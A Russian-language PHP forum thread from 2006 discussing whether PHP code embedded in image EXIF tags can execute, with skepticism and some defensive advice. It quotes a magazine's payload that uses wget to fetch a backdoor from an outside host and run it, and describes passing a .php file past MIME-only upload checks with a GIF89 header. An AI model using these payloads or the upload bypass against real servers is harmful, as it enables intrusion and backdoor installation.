exif уязвимости

Kirill

Новичок
exif уязвимости

недавно прочитал статью, в которой хакер вставил в изображение теги <? ?> и часть рисунка проинтерпритировалась как команда. Каким образом это происходит, где про это можно подробно прочитать, как защититься.
 

Rashkin

Новичок
дайте ссылку на статью, дюже умные журналисты и не такое могут написать )
 

WP

^_^
Kirill
Ну, если картинку include'ят то да. Защититься - программер должен выпить йаду.
 

Kirill

Новичок
подробный рассказ:
<?php echo "интерпретируй меня"; ?>
я ржу как лошадь :)

Статься была опубликована в журнале Хакер за июль 2006 года, называется Взлом госэкзамена, стр. 69.

щас поищу может они у себя на серваке её выложили

-~{}~ 06.08.06 01:17:

на серваке нету, наберу парочку интересных строк:

"Но буквально через час я вспомнил, что рисунок - это не просто изображение. В него можно вставлять различные теги, которые в ряде случаев способны выполнятся как команда. Вмоем случае это сделать достаточно реально. Смотри:движок регистрации написан на php, теоретически при показе рисунка скрипт тупо берет все его содержимое и сливает браузеру. Но при наличие вредных тегов, обрамленных <??>, часть рисунка может интерпритироваться как команда!"
...
"далее дело техники: в поле введения EXIF я забил незамысловатую строку <?system(id);?>"
 

WP

^_^
Мне всегда нравилась мурзилка. Особенно статья "куда уходят уины", ржал в метро всю дорогу.
Там много обмана, т.е. выдуманных багов и взломов.

-~{}~ 06.08.06 01:21:

Ржу как лошадь.... набери еще чего-нибудь оттуда)))
> Но буквально через час я вспомнил, что рисунок - это не просто изображение. В него можно вставлять различные теги, которые в ряде случаев способны выполнятся как команда
Ужас.. "в ряде случаев" это зач0т.
> <?system(id);?>
id -- константа такая? :D этот кусочек позволяет судить о его умственных способностях.

Winamp play 10,000 Maniacs - Because the Night (Maxi radio Live From France)
 

Kirill

Новичок
блин опечатался пока писал, в журнале написано "system("id");" - написано все правильно, меня больше заботит есть ли эта бага в реале, в нете есть инфа про xss - типа через картинку можно выполнить html код, но эт не так опасно, а про данную уязвимость нигде ниче нету :(

-~{}~ 06.08.06 01:28:

зря смеешься http://www.securitylab.ru/vulnerability/239859.php - xss есть в натуре
 

WP

^_^
а какая свять между xss (cross site scripting) и вышеописанным бредом?
 

Kirill

Новичок
связь такая, что опять же из метаданных изображения можно выполнить html код, в статье описано про то что из метеданных был выполнен php код. Далее выписка из статьи, как в итоге был получен доступ:
"Картинка была таже, но подверглась ужасной трепанации. Запрос вырос в разы и стал выглядеть так:"<?system("wget aabbcc4.chat.ru/bd -O /tmp/b;chmod +x /tmp/b; /tmp/b 1.1.1.1");?>", где b был свежескомпилированным под FreeBSD бэкдором."
 

WP

^_^
Это называется не meta-данные, а тэги. Никакого отношения к XSS не имеет. Уязвимости нет в общем случае. Просто есть укуренные программеры которые includ'ят файлы с картинками.
 

_RVK_

Новичок
Описанная ситуация может возникнуть только если при загрузке картинки не проверяется её расширение, а только mime тип. Дело в том что mime проверяется по специальному файлу сигнатуры magic mime, и например, GIF проверяется всего лишь по первым 5 байтам, то есть если в начале файла скрипта есть GIF89 то это будет считаться картинкой, а дальше можно писать PHP код.
Итак, если на сайте есть Upload картинок, то можно скормить файл с расшерением php в котором первыми 5 байтами будет GIF89. Проверка только на mime такой файл пропустит, а апач его выполнит.
 

Kirill

Новичок
а зачем проверять? достаточно запретить выполнение скриптов из диретории где хранятся подкачанные файлы
 

nerezus

Вселенский отказник
Просто прикол в том, чито если есть локальный инклюд, то с помощью сабжа можно превратьть его в глобальный.
 

baev

‹°°¬•
Команда форума
Сверху